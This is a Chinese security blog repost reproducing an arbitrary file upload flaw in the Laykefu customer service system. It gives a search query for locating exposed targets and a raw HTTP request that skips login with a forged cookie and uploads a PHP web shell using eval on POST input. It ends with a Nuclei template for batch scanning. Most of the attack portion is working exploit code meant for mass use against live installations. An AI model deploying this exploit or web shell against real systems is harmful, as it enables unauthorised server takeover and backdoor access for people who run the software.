Laykefu客服系统 任意文件上传漏洞复现

admin 2024年1月24日11:51:12评论76 views字数 1913阅读6分22秒阅读模式

Laykefu客服系统 任意文件上传漏洞复现

Laykefu客服系统 任意文件上传漏洞复现

part.01

Laykefu客服系统 任意文件上传漏洞复现

漏洞简介

Laykefu客服系统 任意文件上传漏洞复现

    Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。

Laykefu客服系统 任意文件上传漏洞复现

part.02

Laykefu客服系统 任意文件上传漏洞复现

漏洞复现

Laykefu客服系统 任意文件上传漏洞复现

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法icon_hash="-334624619"

步骤二:开启代理抓取数据包并修改进行文件上传测试,Success!

POST /admin/users/upavatar.html HTTP/1.1Host: 127.0.0.1Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kRAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user_name=1; user_id=3Connection: close------WebKitFormBoundary3OCVBiwBVsNuB2kRContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/png<?php phpinfo();@eval($_POST['sec']);?>------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Laykefu客服系统 任意文件上传漏洞复现

Laykefu客服系统 任意文件上传漏洞复现

part.03

Laykefu客服系统 任意文件上传漏洞复现

批量脚本

Laykefu客服系统 任意文件上传漏洞复现
id: Laykefu-Uploadinfo:  name: Laykefu-Upload  author: lanyue  severity: high  description: Laykefu-Upload-GetShell  reference:  - https://github.com/  - https://cve.mitre.org/  metadata:    max-request: 1    shodan-query: ""    verified: truehttp:- method: POST  path:  - '{{RootURL}}/admin/users/upavatar.html'  headers:    Accept: application/json, text/javascript, */*; q=0.01    Accept-Encoding: gzip, deflate    Accept-Language: zh-CN,zh;q=0.9    Connection: close    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR    Cookie: user_name=1; user_id=3    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,      like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26    X-Requested-With: XMLHttpRequest  body: "------WebKitFormBoundary3OCVBiwBVsNuB2kRrnContent-Disposition: form-data;    name="file"; filename="1.php"rnContent-Type: image/pngrn rn<?php phpinfo();?>rn------WebKitFormBoundary3OCVBiwBVsNuB2kR--"  max-redirects: 3  matchers-condition: and  matchers:  - type: regex    part: body    regex:    - .{30,}.php  - type: status    part: body    status:    - "200"

    

原文始发于微信公众号(揽月安全团队):Laykefu客服系统 任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月24日11:51:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Laykefu客服系统 任意文件上传漏洞复现http://cn-sec.com/archives/2425288.html

发表评论

匿名网友 填写信息